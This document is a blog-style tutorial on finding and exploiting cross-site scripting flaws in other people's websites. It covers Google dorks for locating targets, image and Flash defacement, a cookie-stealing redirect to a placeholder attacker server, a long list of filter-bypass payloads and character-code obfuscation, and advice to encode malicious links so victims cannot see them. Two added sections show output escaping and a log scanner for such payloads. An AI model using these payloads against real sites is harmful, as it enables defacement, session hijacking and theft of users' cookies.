How to Find XSS Vulnerabilities
Posted by Unknown at 2:52 PM
To start finding these vulnerabilities you can check out blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.
Using 'Google Dorks' makes the finding easier. OK, if you want to get cracking, go to google.com and type inurl:"search.php?q=". That is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities; it's just a matter of having a good eye, and some good knowledge of how to bypass their filtering.
Basics of XSS
Well, now let's start learning some actual methods. The most commonly used XSS injection is:
<script>alert("Priyanshu")</script>
This will show a popup message saying Priyanshu (without the quotes).
So, using "search.php?q=", you can simply try the following on a website with that kind of page:
http://website.com/search.php?q=<script>alert("Priyanshu")</script>
There is a good chance of it working, but don't worry if it doesn't; just try different sites. You can insert HTML, not just JavaScript:
http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>
If you see the bold text and the newlines on the page, then you know it's vulnerable.
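As an added example that is not code from the original post: below is a toy version of the search.php?q= page described above, rendered three ways, so you can see why the bold-text probe works and what actually fixes it. The function names and page markup are my own; the probe strings are the ones from the post.

```javascript
// Added example, not code from the original post: a toy search.php?q= page
// rendered three ways. Function names and markup are my own (assumed);
// the probe strings are the ones used in the post.

// 1. What a vulnerable search page does: the q parameter is concatenated
//    straight into the HTML, so any markup in it becomes part of the page.
function renderSearchUnsafe(q) {
  return '<p>Results for: ' + q + '</p>';
}

// 2. A keyword blocklist of the kind the post later talks about bypassing:
//    it strips the word "script" and nothing else, so plain HTML injection
//    (and any tag that is not <script>) still goes straight through.
function renderSearchBlocklist(q) {
  return '<p>Results for: ' + q.replace(/script/gi, '') + '</p>';
}

// 3. The fix: encode the characters that have meaning in HTML text and
//    attribute values before the value is reflected. The browser then shows
//    the text literally instead of parsing it as markup, whatever was typed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderSearchSafe(q) {
  return '<p>Results for: ' + escapeHtml(q) + '</p>';
}

// The post's check, turned into code: send the harmless bold/underline probe
// and see whether it comes back as live markup. "Live" here means an
// unencoded <b> or <script> tag is present in the rendered HTML.
const HTML_PROBE = '<br><br><b><u>Priyanshu</u></b>';
const SCRIPT_PROBE = '<script>alert("Priyanshu")</script>';

function reflectsMarkup(renderFn, probe) {
  const html = renderFn(probe);
  return /<(b|script)>/i.test(html);
}

// Run stand-alone (node file.js) to see each renderer's verdict.
if (typeof require !== 'undefined' && require.main === module) {
  const renderers = { renderSearchUnsafe, renderSearchBlocklist, renderSearchSafe };
  for (const [name, fn] of Object.entries(renderers)) {
    console.log(name, '| reflects HTML probe:', reflectsMarkup(fn, HTML_PROBE),
                '| reflects script probe:', reflectsMarkup(fn, SCRIPT_PROBE));
  }
}
```

The point of the blocklist renderer is that it "filters" the script probe yet still reflects the bold-text probe, which is exactly the signal the post says to look for; only output encoding at the point of reflection makes both probes come back as harmless text.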
How to Deface a Website using XSS?
Well, now that you understand how XSS works, we can explain some simple XSS deface methods. There are many ways of defacing; I will mention some of the best and most used, the first one being IMG SRC. For those of you who don't know HTML, IMG SRC is a tag that displays the image linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean. Now say you have found a shoutbox, comment box, or anything that shows your data after you submit it: you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed, as the page will already have them. OK, it helps to make your picture big so it stands out and it's clear the site got hacked. Another method is using Flash videos; it's the same as the IMG method above, but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf">
That will execute the Flash video linked to it. Or maybe use a popup or a redirection, such as:
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>
There are many other ways that you can find using Google or other websites. My purpose is to make you understand the concept :)
How to Steal Cookies using XSS?
I decided to add this, as it's the most useful method of XSS. First learn how to make a cookie logger from here: How To Make A Cookie Stealer PHP Script?
OK, now that you have it, save it as a .php file and upload it to your server. Remember to create the file 'log.txt' too and chmod it to 777. Now find an XSS vulnerable website; any attack type will do. Now you're going to want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Now when a user visits the page that got injected, they will be sent to your site, and their cookie will be stolen. The second one is more stealthy. Watch your file now for cookies; then you can hijack their session :D
But now you ask: what if my site doesn't have this kind of attack, it only shows the data once and doesn't store it? Well, let's say we had a page search.php?q=. We can use the following code to make a malicious URL from it, and maybe hex or base64 encode it so people can't see the code.
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
How to Bypass Filtering?
A lot of sites may seem vulnerable but don't execute the code; to solve this, read on. Some common methods to bypass filtering are
')alert('xss');
or
");alert('xss');
which will do the same thing as <script>alert("XSS")</script> on a vulnerable server.
You can also try hex or base64 encoding your data before you submit it. Please note it's bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS", so we use "Priyanshu".
Some other ways to bypass filtering:
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc<script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=abc//abc"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000abc</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q=pwned<script>document.write('Priyanshu');</script>
website.com/search.php?q=pwned</script><script>document.write(Priyanshu);</script>
website.com/search.php?q=pwned')alert(Priyanshu);//
website.com/search.php?q=pwned";)alert(Priyanshu);//
website.com/search.php?q=pwned");alert(/Priyanshu/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://malicous js'</script>
Advanced XSS - a way to bypass magic quotes filtering:
OK, now we are going to learn some good techniques. I have come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless. Fear not, I have come up with a way using char codes (decimals), converting char codes to ASCII. For the function that turns char codes (decimals) into ASCII, you can find a complete table here:
http://www.asciitable.com/
http://easycalculation.com/
This will help you write what you want. In my examples I'll be writing "HOC"; this is the following code:
72 79 67
OK, now that we have the decimal values of our string, we need to know what function in JavaScript converts them.
String.fromCharCode()
is suitable for this kind of thing; it's easy to set up, and I'm going to give it my args below.
String.fromCharCode(72, 79, 67)
OK, now "String.fromCharCode(72, 79, 67)" is the JavaScript (ASCII) way of saying "HOC". And to use this with alerts etc., you don't need to use quotes, as it acts like a variable.
<script>alert(String.fromCharCode(72, 79, 67))</script>
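Added example, not code from the original post, that serves the cookie-stealing, filter-bypass and String.fromCharCode sections above from the defender's side: a small scanner over web server access-log lines that flags search.php?q= requests carrying these kinds of payload, after undoing the percent-encoding and String.fromCharCode() obfuscation the post recommends. The log lines are constructed for this example, the function names and indicator list are my own, and yourServer.com / cookielogger.php are the placeholder names the post itself uses.

```javascript
// Added example, not code from the original post. Log lines below are
// constructed; function names and indicators are my own assumptions.

// Common Log Format line: ip ident user [date] "METHOD path HTTP/x" status bytes
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Undo up to three layers of percent-encoding. Double-encoding is used to
// get past filters that decode only once; decoding until the string stops
// changing defeats that. An invalid sequence ends the loop instead of throwing.
function percentDecode(s) {
  let out = s;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out.replace(/\+/g, ' ')); } catch (e) { break; }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Fold String.fromCharCode(72, 79, 67) back into the literal "HOC" so the
// indicators see the text the victim's browser would actually execute.
function foldCharCodes(s) {
  return s.replace(/String\.fromCharCode\s*\(([\d\s,]+)\)/gi, (m, args) => {
    const codes = args.split(',').map((n) => parseInt(n, 10)).filter((n) => !isNaN(n));
    return '"' + String.fromCharCode(...codes) + '"';
  });
}

// Each indicator corresponds to a technique the post describes.
const INDICATORS = [
  { name: 'script tag',          re: /<\s*script/i },
  { name: 'cookie read',         re: /document\.cookie/i },
  { name: 'javascript: url',     re: /javascript\s*:/i },
  { name: 'img/embed injection', re: /<\s*(img|embed)\b/i },
  { name: 'forced navigation',   re: /(window|document)\.location|location\.href|window\.open/i },
];

// Returns the indicator names matched by one raw query string.
function scanQuery(rawQuery) {
  const decoded = percentDecode(rawQuery);
  const folded = foldCharCodes(decoded);
  const hits = new Set();
  if (/String\.fromCharCode/i.test(decoded)) hits.add('charcode obfuscation');
  for (const { name, re } of INDICATORS) {
    if (re.test(decoded) || re.test(folded)) hits.add(name);
  }
  return [...hits];
}

// Walks log lines and returns one finding per request with a suspicious query.
function analyzeLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const [, ip, when, , path] = m;
    const qIndex = path.indexOf('?');
    if (qIndex < 0) continue;
    const indicators = scanQuery(path.slice(qIndex + 1));
    if (indicators.length) findings.push({ ip, when, path, indicators });
  }
  return findings;
}

// Constructed sample log: one benign search, then four variants of the
// payloads described in the post (plain, cookie exfil, charcode, double-encoded).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=Priyanshu HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22Priyanshu%22)%3C/script%3E HTTP/1.1" 200 610',
  '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?q=%3Cscript%3Edocument.location%3D%22http://yourServer.com/cookielogger.php?c%3D%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 640',
  '203.0.113.9 - - [10/Oct/2023:13:57:15 +0000] "GET /search.php?q=%3Cscript%3Ealert(String.fromCharCode(72,%2079,%2067))%3C/script%3E HTTP/1.1" 200 600',
  '203.0.113.9 - - [10/Oct/2023:13:58:01 +0000] "GET /search.php?q=%253Cscript%253Ealert(/Priyanshu/)%253C/script%253E HTTP/1.1" 200 600',
];

// Run stand-alone (node file.js) to print the findings.
if (typeof require !== 'undefined' && require.main === module) {
  for (const f of analyzeLog(SAMPLE_LOG)) {
    console.log(f.ip, f.when, f.indicators.join(', '));
  }
}
```

Decoding before matching is the important design choice: a filter or detector that compares the raw query against keywords is exactly what the hex/base64 and fromCharCode tricks above are meant to slip past, so normalise first, then match.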
For more XSS script coding, visit
http://ha.ckers.org/xss.html